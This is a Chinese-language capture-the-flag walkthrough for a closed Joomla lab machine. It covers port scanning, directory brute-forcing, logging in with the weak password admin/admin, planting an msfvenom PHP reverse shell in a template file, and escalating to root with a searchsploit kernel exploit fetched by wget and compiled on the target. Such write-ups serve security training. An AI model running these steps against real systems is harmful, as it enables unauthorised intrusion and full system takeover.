任务环境说明:
√ 服务器场景:ubuntujoomla
√ 服务器场景操作系统:ubuntu(版本不详)(封闭靶机)
网络建设与运维-网络安全讨论715170200
1.获取PHP的版本号作为Flag值提交:(例如:5.2.14)
使用nmap扫描工具扫描服务版本
发现靶机开放了80端口,我们访问一下试一试
发现是一个播客,我们使用web网站目录爆破工具dirb扫描网站,试一试能不能爆破出网站后台
成功爆破出网站后台,我们登录进入
通常网站的用户名是admin,密码是admin或者123456
登录进去之后,在底下成功找到php的版本号
Flag:7.0.33
2.获取mysql数据库的版本号作为Flag值提交;(例如:5.0.22)
根据上一题,mysql的版本号也找到了
Flag:5.7.33
3.获取系统内核版本号作为Flag值提交;(例如:2.6.18)
如果要获取系统内核版本号,我们需要执行系统命令,获取内核版本号
通常获取执行命令的方式有上传一句话木马,或者使用msfvenom工具上传反弹木马
通过查看后台,发现可以上传反弹木马,然后执行系统命令
先在kali执行msfvenom工具,获取木马代码
msfvenom -p php/meterpreter/reverse_tcp lhost=本地ip lport=1234 -f raw -o shell.php
查看木马内容,将内容复制到error.php
保存好之后,就可以去使用漏洞模块反弹木马了
exploit/multi/handler
一定要设置好参数,接下来就要去访问一下error.php这个网页了,访问之后就获取到meterpreter命令行了
http://192.168.206.199/templates/beez3/error.php
获取命令行之后,执行uname -r命令查看内核版本
Flag:4.4.0
4.获取网站后台管理员admin用户的密码作为Flag提交;
我们登录网站后台使用的弱口令,admin用户的密码为:admin
Flag:admin
5.找到/root目录中txt文件,将文件内容作为Flag值提交。
我们在shell命令行中输入gcc,查看回显说明存在gcc漏洞
我们执行uname -a,查看内核版本和系统版本
新建一个窗口,搜索源码
searchsploit ubuntu 4.4.0
执行searchsploit -m linux/local/45010.c #将文件下载下来
下载下来之后,上传到/var/www/html目录中,然后开启apache2服务
service apache2 start
在靶机shell中,将源码下载下来
wget http://192.168.206.189/45010.c
下载下来之后,执行gcc 45010.c -o exp
然后再执行exp
成功获取root权限
但是这一题中,/root目录没有flag,主要还是学习提权思路